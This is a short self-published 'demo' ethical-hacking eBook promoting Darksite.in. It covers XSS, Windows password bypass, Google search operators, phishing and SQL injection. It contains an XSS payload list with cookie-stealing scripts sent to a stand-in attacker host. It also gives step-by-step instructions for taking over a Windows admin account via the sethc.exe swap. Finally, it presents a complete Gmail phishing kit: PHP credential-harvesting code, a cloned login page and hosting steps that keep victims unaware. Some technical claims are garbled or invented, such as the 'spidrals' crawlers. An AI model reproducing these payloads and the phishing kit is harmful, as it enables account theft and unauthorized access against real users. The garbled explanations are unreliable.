ACKNOWLEDGEMENT

“For any successful work, it owes to thank many”

No one walks alone & when one is walking on the journey of life just where you start to thank those that joined you, walked beside you & helped you along the way. Over the years, those that I have met & worked with have continuously urged me to write a book, to share my knowledge & skills on paper & to share my insights together with the secrets to my continual, positive approach to life and all that life throws at us. So at last, here it is. So, perhaps this book & it’s pages will be seen as “thanks” to the tens of thousands of you who have who have helped to make my life what is today. Hard work, knowledge, dedication & positive attitude all are necessary to do any task successfully but one ingredient which is also very important than others is co-operation & guidance of experts & experienced person. All the words is lexicon futile & meaningless if I fail to express my sense of regard to my parents & sister for their sacrifices, blessings, prayers, everlasting love & pain & belief in me. I express heartfelt credit to My Parents Mr. Durgu Nial and Mrs. Manju Nial. I also like thanks to My Elder Brother LaxmiKant Nial, My Uncle Mr.Debashish Rout and all my Family members For their Priceless supports. I also like to thanks to Suranjan Mund And Gobinda Seth for making me introducing Me to internet. Finally to My room Mates and all my beloved friends without you friends I would never reach this position thank you friend. To finish, I am thankful to you also as you are reading this book.

I solely claim all the responsibility for any shortcomings & limitations in this book.

Legal Disclaimer

The information provided in this eBook is to be used for educational purposes only. The author holds no responsibility for any misuse of the information provided. All of the information in this eBook is meant to help the reader develop a hacker defense attitude in order to prevent the attacks discussed. The word “Hack” or “Hacking” in this eBook should be regarded as “Ethical Hack” or “Ethical hacking” respectively.

About the Author

ChandraKant Nial is CEO and Founder of the Darksite.in, visit darksite.in for lot of ethical hacking and new technology learning and gain knowledge. I am a student and a quick learner. I do what I love and I love what I do. Contact me: chandrakantnial8@gmail.com

www.darksite.in

=>Introduction

=>Xss Attack

=>Winows hacking

=>Google hacking

=>Phishing Attack

=>SQL Injection

=>Darksite’s Links (Very Useful and Important)

[This Just an demo Book Tried By Chandrakant Nial For Darksite.in Many Contents more then 50+

Will be added on the full version of the book I need a good support from the readers and if any

publisher wish to publish hard copy of my book or anyone having any such motive contact me at my

E-mail (chandrakantnial8@gmail.com) address Thank you.]

(WIFI Hacking, Phone Phreaking ,Android tricks, Cell phone rooting, Latest Mobile

Tricks, Phishing, E-mail hacking, Hardware hacking ,Web server hacking ,Serious

Google dorks, Many website hacking, Trojan Attack ,Windows hacking , Web

vulnerability, Remote File Uploading Vulnerability , Hacking using key loggers

Complete tutorial, Server rooting, Defacing sites easily, Joomla sites hacking,

Backtrack and Its usages for hacking ,Many New Face book tricks ,YouTube hackings ,

Linux password breaking, bios password breaking, Spoofings…and many more I have

already given few of them in DARKSITE LINK but I will putting them all in my final

book)

Stay Connected with DARKSITE for More Updates

Introduction Cyber Forensics Cyber forensics is otherwise also known as computer forensics. Computer forensics is

an art and science of applying computer science to aid the legal process. Cyber

forensics also includes the act of making digital data suitable for inclusion into a

criminal investigation. Today cyber forensics is a term used in conjunction with law

enforcement, and is offered as courses at many colleges and universities worldwide.

Over view

In the early 1980s personal computers became more accessible to consumers leading

to their increased use in criminal activity (for example, to help commit fraud). At the

same time, several new "computer crimes" were recognized (such as hacking). Since

then computer crime and computer related crime has grown exponentially, and even

has jumped 67% between 2002 and 2003. Today it is used to investigate a wide

variety of crime, including fraud, stealing information, cyber stalking.

Forensic techniques and expert knowledge are used to explain the current state of

a digital artifact; such as a computer system. The scope of a forensic analysis can vary

from simple information retrieval to reconstructing a series of events. In a 2002

book Computer Forensics authors Kruse and Heiser define computer forensics as

involving "the preservation, identification, extraction, documentation and

interpretation of computer data".They go on to describe the discipline as "more of an

art than a science", indicating that forensic methodology is backed by flexibility and

extensive domain knowledge. However, while several methods can be used to extract

evidence from a given computer the strategies used by law enforcement are fairly rigid

and lacking the flexibility found in the civilian world.

In current scenario cyber world plays major role among all the people, life is quite

impossible without internet, internet is now available everywhere as I always say

“DAYs BEGINs WITH INTERNET”.

Cyber forensics plays very much Important and crucial role in our day to day life.

ETHICAL HACKER

An ethical hacker is a computer and network expert who attacks a security system on

behalf of its owners, seeking vulnerabilities that a malicious hacker could exploit. To

test a security system, ethical hackers use the same methods as their less principled

counterparts, but report problems instead of taking advantage of them. Ethical hacking

sometime also known as penetration testing, intrusion testing and red teaming.

XSS Attack Cross-site scripting or XSS is a threat to a website's security. It is the most common

and popular hacking a website to gain access information from a user on a website.

There are hackers with malicious objectives that utilize this to attack certain websites

on the Internet. But mostly good hackers do this to find security holes for websites and

help them find solutions. It would be advantageous for website owners to understand

how cross-site scripting works and how it can affect them and their users so they could

place the necessary security systems to block cross-site scripting on their website.

Cross Site Scripting is a technique used to add script to a trusted site that will be

executed on other users browsers. A key element to XSS is that one user can submit

data to a website that will later be displayed for other users. It is necessary that the bad

guy NOT

Mess up the HTML structure otherwise the result will be web defacement rather than

attacking other users.

Cross-Site Request Forgery, also known as one click attack or session riding and

abbreviated as CSRF (Sea-Surf) or XSRF, is a kind of malicious exploit of websites.

Although this type of attack has similarities to cross-site scripting (XSS), cross-site

scripting requires the attacker to inject unauthorized code into a website, while cross-

site request forgery merely transmits unauthorized commands from a user the website

trusts.

Types of XSS Non President XSS

This is one of the most common types of XSS attacks you will find. These types of

XSS attacks are possible when user supplied data is instantly used by server side

scripts to generate a page, based on the users input.

President XSS The persistent (or stored) XSS vulnerability is a more devastating variant of a cross-

site scripting flaw: it occurs when the data provided by the attacker is saved by the

server, and then permanently displayed on "normal" pages returned to other users in

the course of regular browsing, without proper HTML escaping. A classic example of

this is with online message boards where users are allowed to post HTML formatted

messages for other users to read.

DOM Based XSS

DOM Based Cross-Site Scripting is the de-facto name for XSS bugs which are the

result of active browser-side content on a page, typically JavaScript, obtaining user

input and then doing something unsafe with it which leads to execution of injected

code. This document only discusses JavaScript bugs which lead to XSS

XSS Query List Here are More Xss scripts that you may like Link to Practice Xss

</ Textarea> <script> alert (/ xss /) </ script>

</ Title> <script> alert (/ xss /) </ script>

<script src=http://yoursite.com/your_files.js> </ script>

"> <script> Alert (0) </ script>

<IMG SRC = javascript: Alert (String.fromCharCode (88,83,83))>

<IMG SRC=\"javascript:alert('XSS');\">

<IMG SRC=\"jav ascript:alert('XSS');\">

<IMG SRC=\"jav ascript:alert('XSS');\">

<marquee> <script> alert ('XSS') </ script> </ marquee>

<? echo ('<scr)';echo('ipt> alert (\ "XSS \") </ script>');?>

<style> @ im \ port '\ ja \ vasc \ ript: alert (\ "XSS \ ")';</ style>

<img src=foo.png onerror=alert(/xssed/) />

<script> alert (String.fromCharCode (88,83,83)) </ script>

<Scr <script> ipt> alert ('XSS');</ scr </ script> ipt>

<script>location.href="http://www.yourevilsite.org/cookiegrabber.php

?cookie="+escape(document.cookie)</script>

<script src="http://www.yourevilsite.org/cookiegrabber.php"> </

script>

<script> alert ('XSS');</ script>

<script> alert (1); </ script>

<IMG LOWSRC = \ "javascript: Alert ('XSS') \ ">

<IMG DYNSRC = \ "javascript: Alert ('XSS') \ ">

<font style='color:expression(alert(document.cookie))'>

<Img src = "javascript: Alert ('XSS') ">

<script language="JavaScript"> alert ('XSS') </ script>

See XssCompleteTutorial from (Darksite)

<Body onunload = "javascript: Alert ('XSS');">

<Body onLoad = "alert ('XSS');"

[Color = red 'onmouseover = "alert (' xss')"] mouse over [/ color]

"/></ A ></>< img src = 1.gif onerror = alert (1)>

window.alert ("Bonjour!");

<div

style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCo

de(88,83,83));'))">

<Iframe <? Php echo chr (11)?> Onload = alert ('XSS')></ iframe>

"> <Script alert (String.fromCharCode (88,83,83)) </ script>

'>> <marquee> <h1> XSS </ h1> </ marquee>

'">>< Script> alert ('XSS') </ script>

'">>< Marquee> <h1> XSS </ h1> </ marquee>

<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; url = javascript:

Alert ('XSS'); \ ">

<META HTTP-EQUIV = \ "refresh \" CONTENT = \ "0; URL = http://;

URL = javascript: Alert ('XSS'); \ ">

<script> var var = 1; alert (var) </ script>

<STYLE Type="text/css"> BODY {background: url ("javascript: Alert

('XSS')")}</ STYLE>

<?='< SCRIPT> alert ("XSS") </ SCRIPT> '?>

<IMG SRC = 'vbscript: Msgbox (\ "XSS \") '>

"Onfocus = alert (document.domain)"> <"

<FRAMESET> <FRAME SRC = \ "javascript: Alert ('XSS'); \ "> </

FRAMESET>

<STYLE> Li {list-style-image: url (\ "javascript: Alert ('XSS') \ ");}</

STYLE> <UL> <LI> XSS

perl-e 'print \ "<SCR\0IPT> alert (\" XSS \ ") </ SCR \ 0IPT> \";'> out

perl-e 'print \ "<IMG SRC=java\0script:alert(\"XSS\")> \";'> out

<br size=\"&{alert('XSS')}\">

What is hacking? In simple word Hacking is a process to bypass the security mechanisms of an

information system or network.

Or

We can also describe Hacking is an unauthorized use of computer and network

resources. (The term "hacker" originally meant a very gifted programmer. In recent

years though, with easier access to multiple systems it now has negative implications.)

Types of Hacking 1. Local Hacking

Local hacking is done from local area where we have physical access, like through

printer etc. We do this type of hacking through Trojans and viruses with the help of

hard disk and pendrive.

2. Remote Hacking

Remote hacking is done remotely by taking advantage of the vulnerability of the target

system. We need to follow steps for remote hacking to enter on target system.

3. Social Engineering

Social engineering is the act of manipulating people into performing actions or

divulging confidential information. While similar to a confidence trick or simple

fraud, the term typically applies to trickery or deception for the purpose of information

gathering, fraud, or computer system access; in most cases the attacker never comes

face-to-face. Types of Hackers General Categories Of hacker: = Black-Hat

Unauthorized break-ins (malicious intent including crackers) White-Hat

Debug or correct security vulnerabilities Main focus: secure/protect IT systems

Gray-Hat Morally Ambiguous. Black-Hat skills, White-Hat tasks?

Windows Passwod hacking There are many different methods that exists we will b discussing very few of them Here are those

ERD Commander

1. Start your computer and enter into Bios Setup.

2. Change your boot preferences to boot from CD /DVD.

3. Insert your ERD Commander Bootable CD.

4. Once the ERD Commander starts booting it will ask you for Windows Installation,

select appropriate installation for which you need to reset passwod

Once ERD is loaded it will present you a interface similar to windows.Click the START button, Select System Tools > and then select Locksmith.

Enter you new password and close Click Start Button again and restart the PC

This is one of the classic methods used to hack windows xp password perfectly working…

Method 2

Break Windows Admin Password Using Ophcrack Live CD Downlod Oph Crack XP Live CD Link

Downlaod Oph Crack Vista Live CD Link

Boot your pc with ophcrack LiveCD and your Password will be Automatically Broke.

Method 3

Hack Windows Password with the Help of Hiren’s Boot CD

Methiod 4

Break Password Of Windows 7 and Server 2008 with Syskey Syskey download link

Hack Admin Password from Guest Account

For XP User

Go to C:\windows\system32 Copy cmd.exe on your desktop

Rename it to sethc.exe. Now copy that file and paste again in system32 directory. When windows

ask for overwriting the file, then click yes.

Now Log out from your guest account and at the user select window, press shift key 5

times or Left (ALT+Shift+ Num Lock).

For Windows 7 User

Right click on sethc.exe and run as administrator.

Right click on sethc.exe, Click on properties. and Click on Advanced tab

Now Select your Current user and click on Change Permissions

Now Click on Edit

Now Click on Full Control Check Box and Click OK

Copy the New sethc.exe to system32, and click copy and replace

Now Restart your PC

Resetting the Password

Once you get to the login screen, hit the Shift key 5 times, and you’ll see an administrator mode

command prompt.

Now to reset the password—just type the following command, replacing the username and

password with the combination you want:

Command : net user account.name *

Example: net userdarksite *

and hit enter. Set any password for that account

Now it’s done Method 6

Using Proactive System Password Recovery

Method 7

Using Active Password Changer

All these methods are explained in details with screen shot in the premium Book …This Book is just and

demo Book.

Window 7 Actvation Without Crack (Darksitelink)

What actually does?

Google has a very simple formula of being world’s top site.google has its own crawlers and spidrals.

Now the question ariases what is crawlers?

Crawlers are used just to chat with the links presents on a site.they have nothing to with the site

content of site or type of site all they do is just dig the number of links present in the site .

Some famous Crawlers are BOST, ZINCNIC, and RAVCE…etc.

What is Spidral?

Spidrals read the Meta tag, heading, paragraph tag of the html page or indirectly spidrals read the

content of the site.

Some spidrals are vozic, hyping…etc

Altavista, yahoo, rediff, BAIDU…etc

Every search engines has it own crawlers and spidrals but google has the strong out of them.

These crawler and spidrals can me make disabling visiting to a site by the help of robots.txt

Crawler and spidrals never visit the links having robots.txt they simply ignore those parts of the site.

Here below we are discussing some smart search that one should know.

Alternate query types

Cache:

If you include other words in the query, Google will highlight those words within the cached document. For

instance, [cache: www.google.com web] will show the cached content with the word "web" highlighted.

Its shows the previously stored information about the sites , its shows the catches about the page..

This functionality is also accessible by clicking on the "Cached" link on Google's main results page.

The query [cache:]

This will show the version of the web page that Google has in its cache. For instance, [cache:

www.google.com] will show Google's cache of the Google homepage. Note there can be no space between

the "cache:" and the web page url.

Link:

Shows the links regarding the sites

The query [link:]

This will list webpages that have links to the specified webpage. For instance, [link: www.google.com] will list

webpages that have links pointing to the Google homepage. Note there can be no space between the "link:"

and the web page url.

This functionality is also accessible from the Advanced Search page, under Page Specific Search > Links.

Related:

Shows the related information.

The query [related:]

This will list web pages that are "similar" to a specified web page. For instance, [related: www.google.com]

will list web pages that are similar to the Google homepage. Note there can be no space between the

"related:" and the web page url.

This functionality is also accessible by clicking on the "Similar Pages" link on Google's main results page, and

from the Advanced Search page, under Page Specific Search > Similar.

Info:

Provides the more information about the site.

The query [info:]

This will present some information that Google has about that web page.

For instance, [info: www.google.com] will show information about the Google homepage. Note there can be

no space between the "info:" and the web page url.

This functionality is also accessible by typing the web page url directly into a Google search box.

Other information needs

Define:

Define the site clearly.

The query [define:]

Will provide a definition of the words you enter after it, gathered from various online sources. The definition

will be for the entire phrase entered (i.e., it will include all the words in the exact order you typed them).

Stocks:

If you begin a query with the [stocks:] operator, Google will treat the rest of the query terms as stock ticker

symbols, and will link to a page showing stock information for those symbols. For instance, [stocks: intc

yhoo] will show information about Intel and Yahoo. (Note you must type the ticker symbols, not the

company name.)

This functionality is also available if you search just on the stock symbols (e.g. [ intc yhoo ]) and then click on

the "Show stock quotes" link on the results page.

Query modifiers

site:

If you include [site:] in your query, Google will restrict the results to those websites in the given domain. For

instance, [help site: www.google.com] will find pages about help within www.google.com. [Help site:com]

will find pages about help within .com urls. Note there can be no space between the "site:" and the domain.

This functionality is also available through Advanced Search page, under Advanced Web Search > Domains.

allintitle:

If you start a query with [allintitle:]

Google will restrict the results to those with all of the query words in the title. For instance,

[allintitle: google search] will return only documents that have both "google" and "search" in the title.

This functionality is also available through Advanced Search page, under Advanced Web Search >

Occurrences.

intitle:

If you include [intitle:] in your query, Google will restrict the results to documents containing that word in

the title. For instance, [intitle:google search] will return documents that mention the word "google" in their

title, and mention the word "search" anywhere in the document (title or no). Note there can be no space

between the "intitle:" and the following word.

Putting [intitle:]

In front of every word in your query is equivalent to putting [allintitle:] at the front of your query:

[intitle:google intitle:search] is the same as [allintitle: google search].

allinurl:

If you start a query with [allinurl:], Google will restrict the results to those with all of the query words

in the url. For instance, [allinurl: google search] will return only documents that have both "google" and

"search" in the url.

Note that [allinurl:]

works on words, not url components. In particular, it ignores punctuation. Thus, [allinurl: foo/bar] will

restrict the results to page with the words "foo" and "bar" in the url, but won't require that they be

separated by a slash within that url, that they be adjacent, or that they be in that particular word order.

There is currently no way to enforce these constraints.

This functionality is also available through Advanced Search page, under Advanced Web Search >

Occurrences.

inurl:

If you include [inurl:] in your query, Google will restrict the results to documents containing that word in the

url. For instance, [inurl:google search] will return documents that mention the word "google" in their url,

and mention the word "search" anywhere in the document (url or no). Note there can be no space between

the "inurl:" and the following word.

Putting "inurl:" in front of every word in your query is equivalent to putting "allinurl:" at the front of your

query: [inurl:google inurl:search] is the same as [allinurl: google search].

[DARKSITE LINKS]

Google Secret Pages

How to use GOOGLE for Hacking

Unproteced Camera Acess with Google

Offline Google search without internet

Google Dorks

(MANY MORE SUCH TRICKS AND TIPS WITH GOOGLE WILL BE GIVEN IN FULL VERSION OF THIS BOOK I WILL PUT SOME DEADLY SERIOUS HACKING WITH GOOGLE AND MANY GOOGLE DROKS IN THAT BOOK.)

PHISHING ATTACK

Phishing is the criminally fraudulent process of attempting to acquire sensitive information such as usernames, passwords and credit card details. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies.)

How E-mail account got hacked? [javascript: alert(document.getElementById('Passwd').value); ] Using Weak Password, Keyloggers, coockees , temprarory files, Sniffers (packet capturing software) E- Mail click Attacks (Incrasing Rapidly) Trojans,spams,email Bom Attracting towards Hackers (Social Engineering) Insufficient knowledge About Phishing Protection Tips Use Anti keyloggers software, Good Antivirus, Firewall software. Strong Password (containing symbols,numbers,characters, should not same as

username),do not give personal information to other. Securing from sniffing (run type (arp-a if it shows 4-5 Mac address then u r in

trouble)

Avoid clicking On Unknown Link or Adds

What happens in phishing attack?

1. Attacker convinces the victim to click on the link of fake login page which

resembles a genuine login page.

2. Victim enters his credentials in fake login page that goes to attacker.

3. Victim is then redirected to an error page or genuine website depending on

attacker.

But main drawback in phishing is that victim can easily differentiate between

fake and real login page by looking at the domain name. We can overcome

this in desktop phishing by spoofing domain name.And also there exists many

other methods also… But I am describing Phishing in simple way here see below tutorial Files that are needed: 1. phishing.php

2. index.html 3. password.txt Step 1: Creating phishing.php file First of all we need a PHP script which will collect all the form data. Copy the following code in a text editor (notepad) and save it as phishing.php :Phishing.php CODE: <html> <body> <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["Email"]); fwrite($handle,"\n"); fwrite($handle,$_POST["Passwd"]); fwrite($handle,"\n"); fwrite($handle,"\n"); fclose($handle) ; header("Location:https://www.google.com/accounts/ServiceLoginAuth"); exit; ?> </body> </html>

Step 2 : Creating index.html page Goto Gmail.com (without logging in) , Right click anywhere in the browser and choose view page source Or (Save the page and ) Open the source code in a text editor (notepad). Step 3 Main Part: Now new windows will pop-up where you can see all the HTML code. We need to look for word action. Press CRTL+F and search for action. You will find two action in the code so choose the right one by looking up the following screen-shot (ie, with form id="gaia_loginform"). Replace the link after action between the "..... " with phishing.php (as in the screen-shot)and save this page as index.html (not index.html.txt!!!).

Step 4: Creating text file (password.txt) Now make a new empty text file and name it password.txt Now you have all the three files required Step 5: Final step Upload all the 3 files in file manager of your web hosting. If you don't have your own web hosting at present, search for a free web hosting site which gives PHP access. I prefer www.phpzilla.net. (Top Free Webhosting sites list) Sign up for a free web hosting plan on this site. Goto file manager and Upload all the 3 files and save it. Once everything is up and ready to go, go to the link your host provided you for your website and you should see the Gmail page replica. Type in a username/password and click Sign in. This should have redirected you to the real Gmail page. Now whoever will try to login for Gmail through your Fake page, his/her Username and Password will be automatically saved in Password.txt file as plain text which you can view easily. Also the victim won't have a hint that he/she has been hacked since, he/she will be redirected to the original Gmail page and will get a feel as if he/she entered a wrong password by mistake.

Download these three files here (Ready made... :-))

Security Tips Check Any Site for Originality Here DO Not Get Hacked By Phishing Attack

What is SQL injection??

An SQL injection is often used to attack the security of a website by inputting SQL statements in a

web form to get a poorly designed website to perform operations on the database (often to dump

the database content to the attacker) other than the usual operations as intended by the designer.

SQL injection is a code injection technique that exploits security vulnerability in a website's

software. The vulnerability happens when user input is either incorrectly filtered for string literal

escape characters embedded in SQL statements or user input is not strongly typed and

unexpectedly executed. SQL commands are thus injected from the web form into the database of

an application (like queries) to change the database content or dump the database information like

credit card or passwords to the attacker. SQL injection is mostly known as an attack vector for

websites but can be used to attack any type of SQL database.

(Darksitelink)

SQLInjection Complete Tutorial

Havij Sqli Best tool

Blind Sqli complete Tutorial

More on Hacking From Darksite Links Face book Id | Account Hacking AND Face book Tricks Web Vulnerability And Hacks ATM Hacking And Protection Spoofing MAC Spoofing Caller ID Spoofing E-mail Spoofing Windows How To Create Bootable Pendrive AND Also Using DOS Command Prompt Password Cracking Tools AND Key Loggers Changing XP Sp2 to Sp3 SIXTH SENSE TECHNOLOGY (I Support sixth sense technology) How to make own sixth sense device Sparsh Touch-Copy-Paste Technology Without Mouse Cursor Controlling

5G Technology There are many useful links available in DARKSITE I suggest every reader of this book to please go through Darksite and I am sure you will learn many more things and for the daily viewers stay connected with Darksite to learn more on technology…..Thank you.

Raj Chandel Prayas klushrestha RuchiParna Choudhary Ashish Kohli Reference 1. Google.co.in 2. Face book.com 3. WIKIPEDIA